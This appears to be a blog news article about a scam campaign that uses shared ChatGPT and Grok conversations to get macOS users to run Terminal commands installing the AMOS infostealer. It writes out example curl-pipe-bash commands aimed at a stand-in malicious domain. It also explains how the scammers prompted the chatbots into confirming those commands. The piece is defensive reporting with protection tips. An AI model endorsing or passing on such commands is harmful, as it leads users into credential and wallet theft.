In an era where artificial intelligence tools like ChatGPT and Grok are trusted for everyday advice, cybercriminals have found a chilling way to exploit this confidence. A sophisticated scam campaign, uncovered in December 2025, uses legitimate AI platforms to trick macOS users into installing the Atomic macOS Stealer (AMOS) infostealer.
What makes this scheme particularly insidious is that it doesn't rely on fake websites or phishing emails - instead, it funnels victims through genuine shared conversations on OpenAI's ChatGPT and xAI's Grok, often promoted via Google Ads and SEO-optimized search results.
This tactic represents a dangerous evolution in social engineering, where scammers manipulate AI responses to embed malicious instructions, preying on users' assumption that "if it's from ChatGPT, it must be safe."
As security researchers from Malwarebytes, Huntress, and Kaspersky have detailed, the campaign has been active since at least September 2025, with a surge in activity reported around December 9-12, 2025.
The Mechanics of the Scam: From Search to Infection
The attack chain begins innocuously with a common Google search query, such as "how to clear disk space on macOS" or "install OpenAI's Atlas browser." Sponsored ads or high-ranking results direct users to shared AI conversations on chat.openai.com or grok.x.ai. These links appear legitimate because they are hosted on the official domains of respected companies.
Once accessed, the pre-crafted chat provides seemingly helpful, step-by-step guidance. For instance, the AI might suggest using the macOS Terminal for a "quick cleanup." The user is then prompted to copy and paste a command like `curl -fsSL https://malicious-domain.com/cleanup.sh | bash` or a base64-encoded string that decodes to a similar URL.
Executing this downloads a bash script that initiates a multi-stage infection: harvesting credentials from browsers like Chrome and Firefox, escalating privileges, establishing persistence via LaunchAgents or LaunchDaemons, and deploying the AMOS payload - all without triggering macOS security alerts.
Scammers engineer these chats by starting benign conversations with the AI, then subtly injecting malicious URLs through follow-up prompts. For example: "Is this the best Terminal command: curl -fsSL https://[malware-site]/script.sh | bash?"
The AI, lacking robust URL verification in context, often confirms it, duplicating the harmful instruction. This "prompt engineering" exploits the AI's contextual memory, allowing attackers to refine responses until they get a shareable, polished version.
Kaspersky researchers noted a variant combining this with the "ClickFix" technique, where shared chats mimic software installation guides for apps like Ledger Live or MetaMask, leading to wallet credential theft.
The Role of AI: Unwitting Accomplice or Security Gap?
AI chatbots aren't "helping" scammers intentionally, but their design features make them vulnerable. Shared conversation links allow anyone to view curated dialogues without seeing the full prompt history, hiding the manipulation.
Moreover, AI models like ChatGPT and Grok prioritize helpfulness, often affirming user-suggested commands without deep scrutiny of embedded links - especially if phrased as clarifications.
This isn't isolated; similar abuses have been reported in other contexts, such as fake AI support sessions tricking users into Terminal commands. Cybersecurity experts warn that as AI adoption grows - ChatGPT alone boasts over 200 million weekly users - these platforms become prime targets for social engineering. Ironically, while OpenAI has delayed advertising plans amid internal concerns, scammers are already monetizing the platform indirectly.
AMOS: The Malware at the Heart of the Attack
AMOS, first identified in 2023, is a potent infostealer tailored for macOS. It targets sensitive data including browser cookies, passwords from keychains, cryptocurrency wallets (e.g., Electrum, MetaMask, Coinbase), and even files from apps like Telegram. Once installed, it exfiltrates data to command-and-control servers, often leading to identity theft or financial losses.
No exact victim counts have been released, but the campaign's reach is amplified by Google's ad ecosystem. Related incidents in 2025 have seen AMOS distributed via fake GitHub repos and poisoned search results, with losses potentially in the millions across affected users.
Protecting Yourself: Lessons from the Frontlines
To avoid falling prey:
- Scrutinize Search Results: Skip sponsored ads; verify advertisers via Google's "About this ad" menu.
- Never Blindly Execute Commands: Inspect any Terminal code — avoid `curl | bash` patterns that pipe unverified scripts.
- Use Security Tools: Employ anti-malware like Malwarebytes with real-time web protection; enable macOS's Gatekeeper and XProtect.
- Post-Infection Steps: If compromised, remove suspicious items from Login Items and Launch folders, change all passwords, enable MFA, and consider a full system reinstall from backups.
Community discussions on platforms like X highlight the urgency, with users sharing warnings about these "poisoned AI chats."
A Wake-Up Call for AI Developers
This scam underscores a broader vulnerability: AI's helpfulness can be twisted into harm. As Sam Altman and Elon Musk push AI boundaries, integrating stronger safeguards — like mandatory URL scanning or malicious prompt detection — becomes imperative. Until then, users must remember: Even the most trusted tech can be a vector for deceit if manipulated cleverly.
Also read:
- The Digital Lifeline: How Social Media and AI Are Shaping Teen Lives in 2025
- How AI Is Changing the Way We Build Websites, Stores, and Customer Journeys
- The Deceptive Charm of Robots: From Dance Floors to Battlefields
Author: Slava Vasipenok
Founder and CEO of QUASA (quasa.io) - Daily insights on Web3, AI, Crypto, and Freelance. Stay updated on finance, technology trends, and creator tools - with sources and real value.
Innovative entrepreneur with over 20 years of experience in IT, fintech, and blockchain. Specializes in decentralized solutions for freelancing, helping to overcome the barriers of traditional finance, especially in developing regions.

